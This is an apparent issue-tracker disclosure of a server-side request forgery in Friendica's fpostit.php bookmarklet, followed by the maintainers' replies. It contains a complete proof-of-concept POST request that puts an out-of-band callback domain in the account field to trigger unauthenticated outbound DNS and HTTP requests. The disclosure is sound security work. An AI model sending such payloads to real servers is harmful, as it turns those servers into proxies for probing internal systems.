SSRF in fpostit.php

[snajafov]

Hello Friendica Team!

Issue detail

I found a vulnerability issue while testing Friendica locally. The vulnerability lies in fpostit.php
It is possible to induce the application to perform server-side DNS lookups of arbitrary domain names and HTTP request.

Bug Description

The ability to send requests to other systems can allow the vulnerable server to be used as an attack proxy. By submitting suitable payloads, an attacker can cause the application server to attack other systems that it can interact with. This may include public third-party systems, internal systems within the same organization, or services available on the local loopback adapter of the application server itself. Depending on the network architecture, this may expose highly vulnerable internal services that are not otherwise accessible to external attackers.

Steps to Reproduce

The request

POST /mods/fpostit/fpostit.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
Origin: http://localhost
Connection: close
Referer: http://localhost/mods/fpostit/fpostit.php

friendica_acct_name=abc%40zhkhlwppnozxttrzmk7ct6rix930rrlfa.oastify.com&friendica_password=abc&content=test&submit=PostIt%21

The response

HTTP/1.1 200 OK
Date: Thu, 08 Feb 2024 20:38:53 GMT
Server: Apache/2.4.56 (Debian)
X-Powered-By: PHP/8.1.27
Set-Cookie: username=abc%40zhkhlwppnozxttrzmk7ct6rix930rrlfa.oastify.com; expires=Wed, 04-Dec-2024 20:38:53 GMT; Max-Age=25920000
Set-Cookie: password=abc; expires=Wed, 04-Dec-2024 20:38:53 GMT; Max-Age=25920000
Vary: Accept-Encoding
Content-Length: 553
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>
	<style>
		body {
			font-family: arial, Helvetica,sans-serif;
			margin: 0px;
		}
		.wrap1 {
			padding: 2px 5px;
			background-color: #729FCF;
			margin-bottom: 10px;
		}
		.wrap2 {
			margin-left: 10px;
			font-size: 12px;
		}
		.logo {
			margin-left: 3px;
			margin-right: 5px;
			float: left;
		}
		h2 {
			color: #ffffff;
		}
		.error {
			background-color: #FFFF66;
			font-size: 12px;
			margin-left: 10px;
		}
	</style>
</head>

<body>
<script language="javascript" type="text/javascript">window.close();</script>
</body>
</html>

The DNS and HTTP request received

More details

To make this request one doesn't need to be authenticated.

Issue remediation

You should review the purpose and intended use of the relevant application functionality, and determine whether the ability to trigger arbitrary external service interactions is intended behavior. If so, you should be aware of the types of attacks that can be performed via this behavior and take appropriate measures.
These measures might include blocking network access from the application server to other internal systems, and hardening the application server itself to remove any services available on the local loopback adapter. If the ability to trigger arbitrary external service interactions is not intended behavior, then you should implement a whitelist of permitted services and hosts, and block any interactions that do not appear on this whitelist.

References

External service interaction (DNS)
CWE-918: Server-Side Request Forgery (SSRF)
CWE-406: Insufficient Control of Network Message Volume (Network Amplification)

Platform Info

This is Friendica, version 2023.12 that is running at the web location http://localhost. The database version is 1542/1542, the post update version is 1507/1507.

Apache version: Apache/2.4.56
PHP version: PHP/8.1.27
DB version: 11.2.2-MariaDB

[MrPetovan]

Thank you for the report!

[snajafov]

Thanks for the quick response!
Do you mind if I request a CVE ID for the vulnerability?

[MrPetovan]

Not at all, go ahead!

[MrPetovan]

So, looking into it, this interaction seems unavoidable, as this is a node-agnostic bookmarklet. The bookmarklet is intended to perform a specific request against the domain part of the WebFinger address of the Friendica account provided in the form.

Since it's node-agnostic, we can't check for a local session before performing the external service request. The path of the target service is appended to the provided "domain", so there's a marginal risk to access arbitrary resources, but the DNS and HTTP requests are expected, even if the latter fails.

Maybe we should scrap this entirely. In the same folder there's another bookmarklet that is node-specific. It requires a little more setup but it wouldn't allow SSRF as it is an authenticated-only service.